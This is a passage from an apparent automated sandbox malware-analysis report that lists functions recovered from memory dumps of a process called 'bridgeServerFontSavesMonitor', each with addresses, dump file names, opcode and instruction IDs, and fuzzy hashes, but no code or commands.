                                                            • Opcode Fuzzy Hash: 3d0a4a60f5781b054e7cf7d172a6cf926834e6e842dd0d2da0f75a92758ebca7
                                                            • Instruction Fuzzy Hash: C921F221B1991D0FE798BB6C946AA7976C3EB99321F1101F9E40EC32F6DD64EC418291
                                                            Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d71bb7e978a42b459a0d8e9e0a0c9cbf2ed05a06163b7b093c6532835327d265
                                                            • Instruction ID: b529cb0d5a020165a2589cebfe80e937c2cc09a4da923f78c2308a07ce0e9d70
                                                            • Opcode Fuzzy Hash: d71bb7e978a42b459a0d8e9e0a0c9cbf2ed05a06163b7b093c6532835327d265
                                                            • Instruction Fuzzy Hash: DB213A36B0D24D4EE331ABA898611EC7B60EF41325F0545B7D04C8E1D3D978268AC365
                                                            Function 00007FFD9BAD27C8 Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 858c4a48687da1aa72d17c8d653b51bf26d9b31893fd282d3325ef26d6da3724
                                                            • Instruction ID: 6f2fb634c066fad1f194280234fc08e517cf86151ab51af893c9122964c28921
                                                            • Opcode Fuzzy Hash: 858c4a48687da1aa72d17c8d653b51bf26d9b31893fd282d3325ef26d6da3724
                                                            • Instruction Fuzzy Hash: 1621A731B0DA1D4FEBA8DB98C4A06A87792FF98760F554379E40DD32D2CD68AC818780
                                                            Function 00007FFD9BAA2075 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a6f40ee0fca21ba647fca8dbee232e039d11869350706fc39f68b34b5df1564
                                                            • Instruction ID: 8648de61f7e8f57a718017e7eb081baf93b370cab94679ef4afa1c951c6e2876
                                                            • Opcode Fuzzy Hash: 7a6f40ee0fca21ba647fca8dbee232e039d11869350706fc39f68b34b5df1564
                                                            • Instruction Fuzzy Hash: FE116330B0DA0E4FEAB8EBA884646B87393FF54700F0240B5D00ED72A2DD686D418650
                                                            Function 00007FFD9BAA1FE8 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7666d2b8042b5748835df10e626df8f803f46709ecf54e51102bfe9d3dd031ec
                                                            • Instruction ID: 64c0efb8ededd9b7375937b6ffdca0a2f26b62b885ddb8f4c57290109e2e9230
                                                            • Opcode Fuzzy Hash: 7666d2b8042b5748835df10e626df8f803f46709ecf54e51102bfe9d3dd031ec
                                                            • Instruction Fuzzy Hash: 7311A721F1EA1E5BE7B4AB9884646F97293FF48710F1241B5D40EE31F2DEAC6E508690
                                                            Function 00007FFD9BAA449C Relevance: .1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8f5d5f02ad7baf33439ab231165e3a280a61b7a265b6791d9e8f3f8e340fb17f
                                                            • Instruction ID: b4a4ea0264ec0777c085a0bb591dd2d32549a0df758752ba45eb14d637d37e52
                                                            • Opcode Fuzzy Hash: 8f5d5f02ad7baf33439ab231165e3a280a61b7a265b6791d9e8f3f8e340fb17f
                                                            • Instruction Fuzzy Hash: 1A11ED30D0892D8FDBA8DB08C494BA973E6EB54310F2541A9D44ED3271CF74AEC5CB45
                                                            Function 00007FFD9BAA5323 Relevance: .1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 564822231bb6c42234dee17e41f32378687a040173cee5a43de2f162b6b4e145
                                                            • Instruction ID: 7d1f673562543a7625d65cf322dc3bd0157e476bbb80ed7df22ef99f9cfe7115
                                                            • Opcode Fuzzy Hash: 564822231bb6c42234dee17e41f32378687a040173cee5a43de2f162b6b4e145
                                                            • Instruction Fuzzy Hash: ED017021F1AA0D4FEFB8E7B8806967822C39F94700B0A00B5D00EC72F2ECB9AD418714
                                                            Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 82a9f36e522e754ee400106d3f751e20abb237ded239e73501214674f7ada03f
                                                            • Instruction ID: 02e6b586664894bfd40054fb4812d7ea2db9dcc27b75b9830fb5ea75b05f2daf
                                                            • Opcode Fuzzy Hash: 82a9f36e522e754ee400106d3f751e20abb237ded239e73501214674f7ada03f
                                                            • Instruction Fuzzy Hash: 7E11A335B0E68D8EE721DFA8886119C7BB1EF42711F0645B7C088DB1A2D574164987A4
                                                            Function 00007FFD9BAA108D Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3aa7803780815850d76797c18d5a2d8b80251009b47a7449f2b0e73cc15f6ed9
                                                            • Instruction ID: 514e8b122e16625aa29a871384f36b69df892c0f38895378e74c94ec818c6534
                                                            • Opcode Fuzzy Hash: 3aa7803780815850d76797c18d5a2d8b80251009b47a7449f2b0e73cc15f6ed9
                                                            • Instruction Fuzzy Hash: BE01DB11A4E6C52FD76947B05C719A13F95CF9726070A02FAE099DB1F3C84D5986C361
                                                            Function 00007FFD9BADBD90 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1ad32331694ce81838fc8a59064182af3c94c3c8f492b38f087bc4e95429afa7
                                                            • Instruction ID: f77bcad7701769c88ec3d1dd2c42f7dadcc147817c002f31151fb841c81a07ef
                                                            • Opcode Fuzzy Hash: 1ad32331694ce81838fc8a59064182af3c94c3c8f492b38f087bc4e95429afa7
                                                            • Instruction Fuzzy Hash: 5B0126367595450BC719E72CE8E64D477A0FF5213E74803F2D089CF173E958D44A8680
                                                            Function 00007FFD9BADDA48 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9a2a7ae4a3eaefa88f0e80d4207018cae27b2323ff470bda2d68951f0b98d6b9
                                                            • Instruction ID: e72067466e168418a38ffcce2033beebc533a57d8eabb2e92f6f77ad10fb9e7d
                                                            • Opcode Fuzzy Hash: 9a2a7ae4a3eaefa88f0e80d4207018cae27b2323ff470bda2d68951f0b98d6b9
                                                            • Instruction Fuzzy Hash: D3017132F094098BFBA4DB9898957FC73A1EBD8320F464271D50CD71A5DE79AA818780
                                                            Function 00007FFD9BAA0C40 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d023ec2868f824baed77f8c41d73f85fca4a41eb64c5f3e21906c5ec20e96930
                                                            • Instruction ID: 9bf38bdb979dfdbe8453b08beff877560a5af44b111f6b5aaba68bb9f18d51f6
                                                            • Opcode Fuzzy Hash: d023ec2868f824baed77f8c41d73f85fca4a41eb64c5f3e21906c5ec20e96930
                                                            • Instruction Fuzzy Hash: 9B01A135B0E68D8FE722DFA8886419CBFB1EF42711F0645F7C088DB1A2D97466498764
                                                            Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9482d04e698df129469b6ce84b973e261f9e59e91a21eceed696bb02a62e47df
                                                            • Instruction ID: 3e927211c3c7800c72d106962f86ee1e44214be734c1e76048084bc6e357b956
                                                            • Opcode Fuzzy Hash: 9482d04e698df129469b6ce84b973e261f9e59e91a21eceed696bb02a62e47df
                                                            • Instruction Fuzzy Hash: CE019235A0E38D9FD721DFA4885419CBFB1AF42710F1641E7D088DB1A2D9746645C754
                                                            Function 00007FFD9BADBE35 Relevance: .0, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca9b55b6b3d835b8f47b898187bef3f092d46dcfeeea2c1d12b24c31106aa6a0
                                                            • Instruction ID: b4b5c72910fa5fa2d59493e586798f9c92d242596f9d038f92de2257710672e7
                                                            • Opcode Fuzzy Hash: ca9b55b6b3d835b8f47b898187bef3f092d46dcfeeea2c1d12b24c31106aa6a0
                                                            • Instruction Fuzzy Hash: 39F0591671E1980AC72AB73C68B54F83B50DFA623A78903F7D089CF0A7D808844AC345
                                                            Function 00007FFD9BAA20A4 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e13fa36616500ce40822b65a238d87a0679f7d9ca0cfcedc23b3f3403c21563d
                                                            • Instruction ID: 0faa1cc4696bb59613143b2fb120e16deb483ffc059ebe18adf0a15aeaeba8b3
                                                            • Opcode Fuzzy Hash: e13fa36616500ce40822b65a238d87a0679f7d9ca0cfcedc23b3f3403c21563d
                                                            • Instruction Fuzzy Hash: 2CF08634E1D91E8BEBB8AB94C8646F97362FB44311F1241B9C04ED31A1CE786E85CA50
                                                            Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3fa5deb9a5086415271da76bfbc959ad367d11b27124175dab5c24a751fbde64
                                                            • Instruction ID: a9ce8ca3fe444f8aa684a8f1104411b1f7a58184a331befda5c01c2d4e37fcd5
                                                            • Opcode Fuzzy Hash: 3fa5deb9a5086415271da76bfbc959ad367d11b27124175dab5c24a751fbde64
                                                            • Instruction Fuzzy Hash: FE018F34E0E38D9FE731DFA488A419CBFB1AF06714F1541E7D488CB1A2D9786A44C755
                                                            Function 00007FFD9BADBDB8 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e0cfe1280d14651cdd5a844383e9fffca28d8f8a6b78154826fca356054c6557
                                                            • Instruction ID: c95af368f534384fe778f9f69fd38bffe6925f348d4c5ac53b8d9152b90a8d0a
                                                            • Opcode Fuzzy Hash: e0cfe1280d14651cdd5a844383e9fffca28d8f8a6b78154826fca356054c6557
                                                            • Instruction Fuzzy Hash: A6F0EC267595050BC328A72CECF54E43750EF9613F78943B7D049CF1B7DC599849C640
                                                            Function 00007FFD9BACD029 Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bac3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6fe1c7599fc9e82c6a9b2eaafecaf30d712c4c376eca06a25c2cf254864a94cb
                                                            • Instruction ID: c024e4f5d94aaa51dda20e0535eb23c44f61a55b6f712f1f0a7e264035a4fb14
                                                            • Opcode Fuzzy Hash: 6fe1c7599fc9e82c6a9b2eaafecaf30d712c4c376eca06a25c2cf254864a94cb
                                                            • Instruction Fuzzy Hash: 56F06D6151E3C40FC3129B3888654647FB0EA2720534B05FBC0CACB5B3D91A888B8302
                                                            Function 00007FFD9BAD32E9 Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 181ca1ada3eb83a48fc2363ed3e498fceb98b459a267c4bc5325a02cbcbd7106
                                                            • Instruction ID: 6f7796e7b9bcfe9084eda7077cd4ed0cc0ca38e15221e1e6cb7d51c3c660dc2b
                                                            • Opcode Fuzzy Hash: 181ca1ada3eb83a48fc2363ed3e498fceb98b459a267c4bc5325a02cbcbd7106
                                                            • Instruction Fuzzy Hash: 02E0122070EBC84FC70E96398C695507FB1EB6B11578A52DBC445CB2F3D919DC89C752
                                                            Function 00007FFD9BAB4792 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9e126082e6e7d33fbdadeee630665ee9f0c59e8dd31bd30ae80c8bef0500291
                                                            • Instruction ID: e6485c8b83a1216852a83b138e99719c1c3cf3be40a7040638d29d61119e998f
                                                            • Opcode Fuzzy Hash: c9e126082e6e7d33fbdadeee630665ee9f0c59e8dd31bd30ae80c8bef0500291
                                                            • Instruction Fuzzy Hash: E7F03021B0D92F4BE669EB8498B06B972D1FB54300F25017ED42AD31F6ED68A9128A50
                                                            Function 00007FFD9BAA1AD2 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b931fe6c32d409d5e1e3c552bf2614522898a2b43125c8a24dd57e992beac69
                                                            • Instruction ID: 556972454a6e57c4a3822440d846e8fdb5a9bdb4fc3cdb0952518ef16796f74c
                                                            • Opcode Fuzzy Hash: 5b931fe6c32d409d5e1e3c552bf2614522898a2b43125c8a24dd57e992beac69
                                                            • Instruction Fuzzy Hash: 35E06561F1E81E5FF6B4A78884643B851D3FB6CF10F460176C40ED32A1DDA96D418794
                                                            Function 00007FFD9BAB3DB2 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ed15529434490e9ec4c8912a1d26bdaa76315af20472bac0306e12745ec051a2
                                                            • Instruction ID: 29074f2ec9193dbaa73a7ee7ec75fd36655d1317d590503b3b90951bfee6e647
                                                            • Opcode Fuzzy Hash: ed15529434490e9ec4c8912a1d26bdaa76315af20472bac0306e12745ec051a2
                                                            • Instruction Fuzzy Hash: 38F01D30E1951E8BEB58EB84D864ABD77A1FF44314F00063ED426D7295DBB466008A40
                                                            Function 00007FFD9BAA3C45 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 54b60745b892445d965a3f194a29e05fcb81bc161cc48a35ac88b369956a510c
                                                            • Instruction ID: 8440553b4daafc62801fb11df7bb18d0cd51a9145371ecb8cf2d821b501f9d9c
                                                            • Opcode Fuzzy Hash: 54b60745b892445d965a3f194a29e05fcb81bc161cc48a35ac88b369956a510c
                                                            • Instruction Fuzzy Hash: 4AE06D21F1AC1D5FE6B4A74C84253B862D3EB6CB00F420276C00DD32A1DD682D428794
                                                            Function 00007FFD9BAA0D01 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d36d3202f13f79b14e9f2c1ba50328e7df9b9faf4186f3c62e80b38e24aaecd7
                                                            • Instruction ID: 335660e4f9a38adb0b13f5c23c9b6f5128a64a0954e9f55fe1e473d9e9c0c98c
                                                            • Opcode Fuzzy Hash: d36d3202f13f79b14e9f2c1ba50328e7df9b9faf4186f3c62e80b38e24aaecd7
                                                            • Instruction Fuzzy Hash: E4F0B431B0964E8EE7A8DF64C4906AD77E2AF54750F1042BAD00DC32E5DA786684CA54
                                                            Function 00007FFD9BAA10C0 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37477a1332f8dbea45706bc70c0e1e34b54eac59278106b873332609dedb0e95
                                                            • Instruction ID: 48eb3969f01be1fcdf52e714998f073c6be4593aa15639478f648221dc536962
                                                            • Opcode Fuzzy Hash: 37477a1332f8dbea45706bc70c0e1e34b54eac59278106b873332609dedb0e95
                                                            • Instruction Fuzzy Hash: 10E02621F5CC4906EBBCA67468B26B07281DB85324B0506BED01AC22DACC495CC14281
                                                            Function 00007FFD9BAC9339 Relevance: .0, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bac3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6be8d3dfea1404478713620fc5ff5350d018e69bbbb89780413002534dc6a9a8
                                                            • Instruction ID: 60906e58f430c49c3df3b296eb373255ec49aabe067f8a7827b98959c5f66fc1
                                                            • Opcode Fuzzy Hash: 6be8d3dfea1404478713620fc5ff5350d018e69bbbb89780413002534dc6a9a8
                                                            • Instruction Fuzzy Hash: C8E04F21A0A7C44FC70A97388C699503FB0EE6B21578F00DBD045CB5F3E559CC48C712
                                                            Function 00007FFD9BAA626F Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bd33c3cc4e4f436a06e9ef3d40521a75bfad1651553843dd3518dad1a3abc9c6
                                                            • Instruction ID: e2dcb4f684eff588c611075954d8418bcf32ea2e915a3ae167b82dc2220a76a4
                                                            • Opcode Fuzzy Hash: bd33c3cc4e4f436a06e9ef3d40521a75bfad1651553843dd3518dad1a3abc9c6
                                                            • Instruction Fuzzy Hash: 84E04F21F0682D6FE6B0A75880643A862D2FB6CB00F0502B6C40DD32A1DD6469428794
                                                            Function 00007FFD9BAB453E Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a910977822b8c92c576265edb5b32a01c18198aee3000b557f60e55b00c8074
                                                            • Instruction ID: 2bdb2ae6b19e107446ba141d4ef05c994ad7ed71a9d7a5c1aaa311ccbac977d4
                                                            • Opcode Fuzzy Hash: 7a910977822b8c92c576265edb5b32a01c18198aee3000b557f60e55b00c8074
                                                            • Instruction Fuzzy Hash: 71E0483570DD1F86F771975888649BE3253ABD0311F164335C029C21E5DEB8E7054A81
                                                            Function 00007FFD9BAC9189 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bac3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ededa431d6dcc5f31b8a5c4a0ea6b7dffbafabdd409673d57963b75450596610
                                                            • Instruction ID: 8050a11e3b0af363771d16532910b4300990286eabbce8d4cb67e2c637cfca9d
                                                            • Opcode Fuzzy Hash: ededa431d6dcc5f31b8a5c4a0ea6b7dffbafabdd409673d57963b75450596610
                                                            • Instruction Fuzzy Hash: CEE01A7154A3C04FCB06AB7488699443FB0AE6B21078E41DEC04ACF1B3E62E894AC701
                                                            Function 00007FFD9BADA7E0 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                            Function 00007FFD9BADA750 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
